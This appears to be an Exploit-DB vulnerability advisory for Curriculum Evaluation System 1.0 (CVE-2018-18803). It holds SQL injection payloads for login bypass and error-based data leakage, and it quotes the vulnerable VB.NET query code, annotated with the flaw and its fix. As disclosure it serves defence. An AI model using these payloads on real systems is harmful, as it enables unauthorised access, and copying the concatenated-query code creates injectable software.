Curriculum Evaluation System 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2018-10-29
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/45719/
  • # Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
    # Dork: N/A
    # Date: 2018-10-29
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: https://www.sourcecodester.com/users/janobe
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
    # Version: 1.0
    # Category: Windows
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: CVE-2018-18803
    
    # POC (error-based; the login routine in includes/user.vb catches the database exception and displays ex.Message in a MsgBox, which is presumably how the EXTRACTVALUE output becomes visible to the user): 
    # 1)
    # User: 'or 1=1 or ''='
    # ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
    
    # POC: 
    # 2)
    # User: 'or 1=1 or ''='
    # Pass: Null
    # 
    # https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
    
    #[PATH]/frmCourse.vb
    # Line 48 below builds the query by concatenating txtSearch.Text straight into the LIKE pattern, with no parameter binding or escaping; passing the search text as a bound parameter of the command would remove the injection.
    #....
    #47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
    #48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
    #49 reloadDtg(sql, dtglist)
    #50 End Sub
    #....
    
    #[PATH]/includes/user.vb
    # Line 09 below concatenates both username and pass into the SQL text; wrapping pass in sha1() inside the statement does not prevent injection. With the POC username the WHERE clause becomes a tautology, so the first row of tbluseraccount is returned and its UserType is trusted (lines 12-13). Both values should be bound as parameters, and the catch block on lines 84-85 should not echo the raw database error to the user.
    #....
    #05 Public Sub login(ByVal username As Object, ByVal pass As Object)
    #06 Try
    #07 
    #08 con.Open()
    #09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
    #10 
    #11 
    #12 If dt.Rows.Count > 0 Then
    #13 If dt.Rows(0).Item("UserType") = "Administrator" Then
    #14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
    #15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
    #16 With Form1
    #17 .tsAddG.Enabled = True
    #18 .tsStudent.Enabled = True
    #19 .tsCurriculum.Enabled = True
    #20 .tsGrades.Enabled = True
    #21 .tsReport.Enabled = True
    #22 .tsUtilities.Enabled = True
    #23 .tsSearchStudent.Enabled = True
    #24 .tsLogin.Image = My.Resources.logout
    #25 .tsLogin.Text = "Logout"
    #26 End With
    #27 
    #28 
    #29 LoginForm1.Close()
    #30 
    #31 
    #32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
    #33 
    #34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
    #35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
    #36 With Form1
    #37 .tsAddG.Enabled = True
    #38 .tsStudent.Enabled = True
    #39 .tsCurriculum.Enabled = True
    #40 .tsGrades.Enabled = True
    #41 .tsReport.Enabled = True
    #42 .tsSearchStudent.Enabled = True
    #43 .tsLogin.Image = My.Resources.logout
    #44 .tsLogin.Text = "Logout"
    #45 End With
    #46 
    #47 
    #48 
    #49 
    #50 LoginForm1.Close()
    #51 
    #52 
    #53 
    #54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
    #55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
    #56 'With Form1
    #57 With Form1
    #58 .tsAddG.Enabled = True
    #59 .tsStudent.Enabled = True
    #60 .tsCurriculum.Enabled = True
    #61 .tsGrades.Enabled = True
    #62 .tsReport.Enabled = True
    #63 
    #64 .tsSearchStudent.Enabled = True
    #65 .tsLogin.Image = My.Resources.logout
    #66 .tsLogin.Text = "Logout"
    #67 End With
    #68 
    #69 
    #70 LoginForm1.Close()
    #71 End If
    #72 
    #73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
    #74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
    #75 'Form1.StatusStrip1.Visible = True
    #76 'inserting logs
    #77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
    #78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
    #79 'create(sql)
    #80 
    #81 Else
    #82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
    #83 End If
    #84 Catch ex As Exception
    #85 MsgBox(ex.Message)
    #86 End Try
    #87 con.Close()
    #88 da.Dispose()
    #89 End Sub
    #....